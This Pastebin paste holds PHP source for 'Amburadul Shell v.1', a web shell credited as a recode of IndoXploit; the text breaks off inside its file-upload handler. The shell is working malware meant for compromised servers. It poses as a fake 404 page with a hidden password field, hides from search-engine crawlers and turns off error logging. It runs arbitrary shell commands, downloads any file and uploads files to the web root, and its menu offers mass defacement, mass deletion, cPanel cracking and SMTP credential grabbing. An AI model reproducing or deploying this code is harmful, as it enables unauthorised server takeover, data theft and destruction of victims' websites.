Guest User

CROT

a guest
Sep 4th, 2018
313
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 116.37 KB | None | 0 0
  1. <?php
  2. $auth_pass = "6ac83452a304c33ec909612ac627fb34"; // default: Aso loe
  3. session_start();
  4. error_reporting(0);
  5. set_time_limit(0);
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14.  
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22.         header('HTTP/1.0 404 Not Found');
  23.         exit;
  24.     }
  25. }
  26.  
  27. function login_shell() {
  28. ?>
  29. <html><head>
  30. <title>404 Not Found</title>
  31. </head><body><h1>Not Found</h1>
  32.     <p>Additionally, a 404 Not Found
  33. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  34.     <hr>
  35.     <address>Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Server at localhost Port 80
  36.             <style>
  37.                     input { margin:0;background-color:#fff;border:1px solid #fff; }
  38.             </style>
  39.             <center>
  40.             <form method="post">
  41.             <input type="password" name="pass">
  42.             </form>
  43.            
  44. <?php
  45. exit;
  46. }
  47. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  48.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  49.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  50.     else
  51.         login_shell();
  52. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  53.     @ob_clean();
  54.     $file = $_GET['file'];
  55.     header('Content-Description: File Transfer');
  56.     header('Content-Type: application/octet-stream');
  57.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  58.     header('Expires: 0');
  59.     header('Cache-Control: must-revalidate');
  60.     header('Pragma: public');
  61.     header('Content-Length: ' . filesize($file));
  62.     readfile($file);
  63.     exit;
  64. }
  65. ?>
  66. <html>
  67. <head>
  68. <title>Amburadul Shell v.1</title>
  69. <meta name='author' content='Recode IndoXploit'>
  70. <meta charset="UTF-8">
  71. <link rel="SHORTCUT ICON" href="https://imgur.com/9LBT77i.png" type="image/png">
  72. <style type='text/css'>
  73. @import url(https://fonts.googleapis.com/css?family=Chewy|Courgette|Jua|Kalam|Ubuntu+Condensed);
  74. html {
  75.     background: #2d4746;
  76.     background-image: url(https://imgur.com/4n1r7od.jpg);
  77. <!--https://imgur.com/4n1r7od.jpg-->
  78.     background-position:cover;
  79.     background-repeat:no-repeat;
  80.     background-size:cover;
  81.     color: #00ffe9;
  82.     font-family: 'Kalam';
  83.     text-shadow: 1px 0px 2px black, 0px 2px 3px black;font-size:px;font-weight: bold;
  84.     font-size: 12px;
  85.     width: 100%;
  86. }
  87. li {
  88.     display: inline;
  89.     margin: 1px;
  90.     padding: 1px;
  91. }
  92.  
  93.  #menu{
  94.     background:#3b5653;
  95.     margin:9px 3px 4px 2px;
  96. }
  97. #menu a{
  98.     padding:4px 19px;
  99.     margin:0;
  100.     background:#365958;
  101.     text-decoration:none;
  102.     letter-spacing:2px;
  103.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  104.  
  105. }
  106. #menu a:hover{
  107.     background:#3b5653;
  108.     border-bottom:1px solid #4a7a75;
  109.     border-top:1px solid #4a7a75;
  110. }
  111. .explore tr:hover{background:#3b5653}
  112. table tr:first-child{  
  113.     background: #619996;
  114.     text-align: center;
  115.     color: white;
  116. }
  117. table, th, td {
  118.     border-collapse:collapse;
  119.     font-family: Tahoma, Geneva, sans-serif;
  120.     background: transparent;
  121.     font-family: 'Courgette';
  122.     font-size: 13px;
  123. }
  124. .table_home, .th_home, .td_home {
  125.     border: 1px solid #619996;
  126. }
  127. th {
  128.     padding: 10px;
  129. }
  130. a {
  131.     color: #00ffe9;
  132.     text-decoration: none;
  133. }
  134. a:hover {
  135.     color: red;
  136.     text-decoration: underline;
  137. }
  138. b {
  139.     color: white;
  140. }
  141. input[type=text], input[type=password],input[type=submit] {
  142.     background: transparent;
  143.     color: red;
  144.     border: 1px solid #00ffe9;
  145.     margin: 5px auto;
  146.     padding-left: 5px;
  147.     font-family: 'Courgette';
  148.     font-size: 13px;
  149. }
  150. input[type=submit] {
  151.     background: #619996;
  152.     color: red;
  153.     border: 1px solid #00ffe9;
  154.     margin: 5px auto;
  155.     padding-left: 5px;
  156.     font-family: 'Courgette';
  157.     font-size: 13px;
  158.     cursor:pointer;
  159. }
  160. textarea {
  161.     border: 1px solid #00ffe9;
  162.     width: 100%;
  163.     height: 400px;
  164.     padding-left: 5px;
  165.     margin: 10px auto;
  166.     resize: none;
  167.     background: transparent;
  168.     color: red;
  169.     font-family: 'Ubuntu Condensed';
  170.     font-size: 13px;
  171.     text-shadow: 1px 0px 2px black;font-size:px;
  172. }
  173. select {
  174.     width: 152px;
  175.     background: #435651;
  176.     color: red;
  177.     border: 1px solid #00ffe9;
  178.     margin: 5px auto;
  179.     padding-left: 5px;
  180.     font-family: 'Ubuntu Condensed';
  181.     font-size: 13px;
  182. }
  183. option:hover {
  184.     background: white;
  185.     color: #435651;
  186. }
  187. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  188. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  189. .infoweb {
  190.     border-right: 1px solid #00FFFF;
  191. }
  192. </style>
  193. <style type='text/css'>
  194. /* Circle Text Styles */
  195. #outerCircleText {
  196. font-style: italic;
  197. font-weight: bold;
  198. font-family: Courgette;
  199. color: red;/*Ganti warna sesuai keinginan*/
  200. position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
  201. #outerCircleText div {position: relative;}
  202. #outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
  203. </style>
  204. <style type="text/css">body { cursor: url('data:image/x-icon;base64,AAACAAEAICAAAA0ABQCoEAAAFgAAACgAAAAgAAAAQAAAAAEAIAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAABQAAAAkAAAALAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAACQAAAAcAAAADAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAwAAAAVAAAAGQAAABwAAAAeAAAAHgAAAB4AAAAeAAAAHgAAABoAAAAUAAAADAAAAAYAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATAAAAJgAAADkAAAA+AAAAQAAAAEEAAABBAAAAQQAAAEEAAABBAAAANAAAACMAAAAQAAAACQAAAAQAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAACYAAABHAAAAZgAAAGgAAABpAAAAagAAAGoAAABqAAAAagAAAGoAAABSAAAANQAAABQAAAAMAAAABQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAANQAAAGAAAACCAAAAgwAAAIMAAACDAAAAgwAAAIMAAACDAAAAgwAAAGgAAABEAAAAGwAAAA8AAAAHAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQsLC/8ICAj/AwMD/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wMDA/8AAACMAAAAdwAAAFEAAAAnAAAAEgAAAAoAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAA///////7+/v/////////////////////////////////GBgY/wAAAI4AAACDAAAAYAAAADcAAAAVAAAADQAAAAUAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAABUdHR3/+/v7//////////////////////////////////////8qKir/AAAAjgAAAIoAAABsAAAARAAAABsAAAAPAAAABwAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHBwcH////////////9fX1//////////////////////////////////z8/P8MDAz/AAAAjQAAAHcAAABRAAAAJgAAABEAAAAIAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAABUAAAD/+fn5/////////////////////////////////////////////////wEBAf8AAACOAAAAgwAAAF8AAAA1AAAAEgAAAAkAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAAA//39/f/9/f3/////////////////////////////////////////////////AQEB/wAAAI4AAACKAAAAaAAAAD8AAAASAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAABgJCQn//Pz8///////////////////////////////////////////////////////6+vr/IyMj/wAAAI0AAABrAAAAQgAAABIAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASBAQE//n5+f/09PT///////////////////////////////////////////////////////j4+P8nJyf/AAAAjgAAAGsAAABBAAAAEAAAAAgAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACMJCQn////////////9/f3////////////////////////////////////////////9/f3//////ywsLP8AAACMAAAAaQAAAD8AAAAOAAAABgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQE//r6+v/6+vr/AAAA//////////////////////////////////////////////////39/f//////LCws/wAAAIkAAABkAAAAOAAAAAoAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDA//b29v///////////8AAAD///////r6+v/7+/v////////////////////////////y8vL///////39/f8sLCz/AAAAfAAAAFUAAAAqAAAABgAAAAIAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwMD/+Tk5P/9/f3/BAQE/wYGBv/////////////////09PT/9PT0/////////////v7+/ycnJ//w8PD//////ywsLP8AAABhAAAAOAAAABYAAAADAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGBgb/BAQE/wgICP8AAAAQAQEB////////////AQEB//39/f//////CQkJ//39/f/+/v7/Gxsb/+fn5//w8PD/KSkp/wAAADwAAAAZAAAACAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAIDAwP///////////8BAQH//f39//////8JCQn//f39//7+/v8bGxv/7e3t/wwMDP8AAAAsAAAAGQAAAAcAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/z8/P//v7+/wICAv/8/Pz//////wEBAf/7+/v/5+fn/ycnJ/8AAAD/AAAAJAAAAA8AAAAHAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8EBAT/BwcH//z8/P//////BQUF/wICAv8AAAD/AAAASwAAABsAAAAPAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQH///////39/f8JCQn/AAAAjgAAAGsAAABDAAAAEgAAAAgAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAf///////f39/wkJCf8AAACMAAAAaQAAAD8AAAANAAAABgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEB///////9/f3/CQkJ/wAAAIgAAABjAAAANwAAAAkAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQH///////39/f8JCQn/AAAAeAAAAFMAAAApAAAABQAAAAIAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAf///////f39/wkJCf8AAABVAAAANwAAABUAAAACAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA///////+/v7/AAAA/wAAACkAAAAYAAAABwAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADw8P/wUFBf8AAAAMAAAADAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA///////////////////////4B///wAf//8AD///AA///gAP//4AB//8AAf//AAH//gAB//4AAf/8AAH/+AAD//gAA//4gAP//4AH//+AD///wD////B////wf///8H////D////w////8P////n///////////////////////8='), auto; }</style>
  205. </head>
  206. <?php
  207. ###############################################################################
  208. //     Mngganti Copyright tidak akan menjadikan anda sebagai programer
  209. ###############################################################################
  210. function w($dir,$perm) {
  211.     if(!is_writable($dir)) {
  212.         return "<font color=red>".$perm."</font>";
  213.     } else {
  214.         return "<font color=white>".$perm."</font>";
  215.     }
  216. }
  217. function r($dir,$perm) {
  218.     if(!is_readable($dir)) {
  219.         return "<font color=red>".$perm."</font>";
  220.     } else {
  221.         return "<font color=white>".$perm."</font>";
  222.     }
  223. }
  224. function exe($cmd) {
  225.     if(function_exists('system')) {        
  226.         @ob_start();       
  227.         @system($cmd);     
  228.         $buff = @ob_get_contents();        
  229.         @ob_end_clean();       
  230.         return $buff;  
  231.     } elseif(function_exists('exec')) {        
  232.         @exec($cmd,$results);      
  233.         $buff = "";        
  234.         foreach($results as $result) {         
  235.             $buff .= $result;      
  236.         } return $buff;    
  237.     } elseif(function_exists('passthru')) {        
  238.         @ob_start();       
  239.         @passthru($cmd);       
  240.         $buff = @ob_get_contents();        
  241.         @ob_end_clean();       
  242.         return $buff;  
  243.     } elseif(function_exists('shell_exec')) {      
  244.         $buff = @shell_exec($cmd);     
  245.         return $buff;  
  246.     }
  247. }
  248. function perms($file){
  249.     $perms = fileperms($file);
  250.     if (($perms & 0xC000) == 0xC000) {
  251.     // Socket
  252.     $info = 's';
  253.     } elseif (($perms & 0xA000) == 0xA000) {
  254.     // Symbolic Link
  255.     $info = 'l';
  256.     } elseif (($perms & 0x8000) == 0x8000) {
  257.     // Regular
  258.     $info = '-';
  259.     } elseif (($perms & 0x6000) == 0x6000) {
  260.     // Block special
  261.     $info = 'b';
  262.     } elseif (($perms & 0x4000) == 0x4000) {
  263.     // Directory
  264.     $info = 'd';
  265.     } elseif (($perms & 0x2000) == 0x2000) {
  266.     // Character special
  267.     $info = 'c';
  268.     } elseif (($perms & 0x1000) == 0x1000) {
  269.     // FIFO pipe
  270.     $info = 'p';
  271.     } else {
  272.     // Unknown
  273.     $info = 'u';
  274.     }
  275.         // Owner
  276.     $info .= (($perms & 0x0100) ? 'r' : '-');
  277.     $info .= (($perms & 0x0080) ? 'w' : '-');
  278.     $info .= (($perms & 0x0040) ?
  279.     (($perms & 0x0800) ? 's' : 'x' ) :
  280.     (($perms & 0x0800) ? 'S' : '-'));
  281.     // Group
  282.     $info .= (($perms & 0x0020) ? 'r' : '-');
  283.     $info .= (($perms & 0x0010) ? 'w' : '-');
  284.     $info .= (($perms & 0x0008) ?
  285.     (($perms & 0x0400) ? 's' : 'x' ) :
  286.     (($perms & 0x0400) ? 'S' : '-'));
  287.     // World
  288.     $info .= (($perms & 0x0004) ? 'r' : '-');
  289.     $info .= (($perms & 0x0002) ? 'w' : '-');
  290.     $info .= (($perms & 0x0001) ?
  291.     (($perms & 0x0200) ? 't' : 'x' ) :
  292.     (($perms & 0x0200) ? 'T' : '-'));
  293.     return $info;
  294. }
  295. function hdd($s) {
  296.     if($s >= 1073741824)
  297.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  298.     elseif($s >= 1048576)
  299.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  300.     elseif($s >= 1024)
  301.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  302.     else
  303.     return $s .' B';
  304. }
  305. function ambilKata($param, $kata1, $kata2){
  306.     if(strpos($param, $kata1) === FALSE) return FALSE;
  307.     if(strpos($param, $kata2) === FALSE) return FALSE;
  308.     $start = strpos($param, $kata1) + strlen($kata1);
  309.     $end = strpos($param, $kata2, $start);
  310.     $return = substr($param, $start, $end - $start);
  311.     return $return;
  312. }
  313. function getsource($url) {
  314.     $curl = curl_init($url);
  315.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  316.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  317.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  318.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  319.     $content = curl_exec($curl);
  320.             curl_close($curl);
  321.     return $content;
  322. }
  323. function bing($dork) {
  324.     $npage = 1;
  325.     $npages = 30000;
  326.     $allLinks = array();
  327.     $lll = array();
  328.     while($npage <= $npages) {
  329.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  330.         if($x) {
  331.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  332.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  333.             $npage = $npage + 10;
  334.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  335.         } else break;
  336.     }
  337.     $URLs = array();
  338.     foreach($allLinks as $url){
  339.         $exp = explode("/", $url);
  340.         $URLs[] = $exp[2];
  341.     }
  342.     $array = array_filter($URLs);
  343.     $array = array_unique($array);
  344.     $sss = count(array_unique($array));
  345.     foreach($array as $domain) {
  346.         echo $domain."\n";
  347.     }
  348. }
  349. function reverse($url) {
  350.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  351.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  352.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  353.           curl_setopt($ch, CURLOPT_HEADER, 0);
  354.           curl_setopt($ch, CURLOPT_POST, 1);
  355.     $resp = curl_exec($ch);
  356.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  357.     $array = explode(",,", $resp);
  358.     unset($array[0]);
  359.     foreach($array as $lnk) {
  360.         $lnk = "http://$lnk";
  361.         $lnk = str_replace(",", "", $lnk);
  362.         echo $lnk."\n";
  363.         ob_flush();
  364.         flush();
  365.     }
  366.         curl_close($ch);
  367. }
  368. if(get_magic_quotes_gpc()) {
  369.     function idx_ss($array) {
  370.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  371.     }
  372.     $_POST = idx_ss($_POST);
  373.     $_COOKIE = idx_ss($_COOKIE);
  374. }
  375.  
  376. if(isset($_GET['dir'])) {
  377.     $dir = $_GET['dir'];
  378.     chdir($dir);
  379. } else {
  380.     $dir = getcwd();
  381. }
  382. $kernel = php_uname();
  383. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  384. $dir = str_replace("\\","/",$dir);
  385. $scdir = explode("/", $dir);
  386. $freespace = hdd(disk_free_space("/"));
  387. $total = hdd(disk_total_space("/"));
  388. $used = $total - $freespace;
  389. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=white>OFF</font>";
  390. $ds = @ini_get("disable_functions");
  391. $mysql = (function_exists('mysql_connect')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  392. $curl = (function_exists('curl_version')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  393. $wget = (exe('wget --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  394. $perl = (exe('perl --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  395. $python = (exe('python --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  396. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=white>NONE</font>";
  397. if(!function_exists('posix_getegid')) {
  398.     $user = @get_current_user();
  399.     $uid = @getmyuid();
  400.     $gid = @getmygid();
  401.     $group = "?";
  402. } else {
  403.     $uid = @posix_getpwuid(posix_geteuid());
  404.     $gid = @posix_getgrgid(posix_getegid());
  405.     $user = $uid['name'];
  406.     $uid = $uid['uid'];
  407.     $group = $gid['name'];
  408.     $gid = $gid['gid'];
  409. }
  410. echo "<font color=red text-shadow: 1px 0px 2px red>System: <font color=white>".$kernel."</font><br>";
  411. echo "User: <font color=white>".$user."</font> (".$uid.") Group: <font color=white>".$group."</font> (".$gid.")<br>";
  412. echo "Server IP: <font color=white>".$ip."</font> | Your IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
  413. echo "HDD: <font color=white>$used</font> / <font color=white>$total</font> ( Free: <font color=white>$freespace</font> )<br>";
  414. echo "Safe Mode: $sm<br>";
  415. echo "Disable Functions: $show_ds<br>";
  416. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  417. echo "Current DIR: ";
  418. foreach($scdir as $c_dir => $cdir) {   
  419.     echo "<a href='?dir=";
  420.     for($i = 0; $i <= $c_dir; $i++) {
  421.         echo $scdir[$i];
  422.         if($i != $c_dir) {
  423.         echo "/";
  424.         }
  425.     }
  426.     echo "'>$cdir</a>/";
  427. }
  428.  
  429. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  430. echo "<hr>";
  431. echo "<center>";
  432. echo "<ul>";
  433. echo "<center><font face='Ubuntu Condensed' size='6px' color='white'>Amburadul Shell v.1</font>";
  434. echo "<center><font color=white>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=red>IndoXploit</font></a></center>";
  435. echo "<br>";
  436. echo "<br>";
  437. echo "<li>[ <a href='?'>Home</a> ]</li>";
  438. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  439. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  440. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  441. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  442. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  443. echo "<br><br><li>[ <a href='?dir=$dir&do=jumping'>Lompat Indah</a> ]</li>";
  444. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]</li>";
  445. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  446. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  447. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  448. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  449. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  450. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  451. echo "<br><li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  452. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  453. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  454. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Eue</a> ]</li>";
  455. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Eue V.2</a> ]</li>";
  456. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  457. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  458. echo "<li>[ <a href='?dir=$dir&do=endec'>Script Encode & Decode</a> ]</li>";
  459. echo "<br><br><li>[ <a href='?dir=$dir&do=jquery'>jQuery</a> ]</li>";
  460. echo "<li>[ <a href='?dir=$dir&do=bypass'>Disable Functions</a> ]</li>";
  461. echo "<br><br><li>[ <a style='color: red;' href='?dir=$dir&do=kill'>Kill</a> ]</li>";
  462. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
  463. echo "</ul>";
  464. echo "</center>";
  465. echo "<hr>";
  466. if($_GET['logout'] == true) {
  467.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  468.     echo "<script>window.location='?';</script>";
  469. } elseif($_GET['do'] == 'upload') {
  470.     echo "<center>";
  471.     if($_POST['upload']) {
  472.         if($_POST['tipe_upload'] == 'biasa') {
  473.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  474.                 $act = "<font color=white>Terupload bossque!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  475.             } else {
  476.                 $act = "<font color=red>failed to upload file boss</font>";
  477.             }
  478.         } else {
  479.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  480.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  481.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  482.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  483.                     $act = "<font color=white>Terupload Boss!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  484.                 } else {
  485.                     $act = "<font color=red>failed to upload file boss</font>";
  486.                 }
  487.             } else {
  488.                 $act = "<font color=red>failed to upload file boss</font>";
  489.             }
  490.         }
  491.     }
  492.     echo "Upload File:
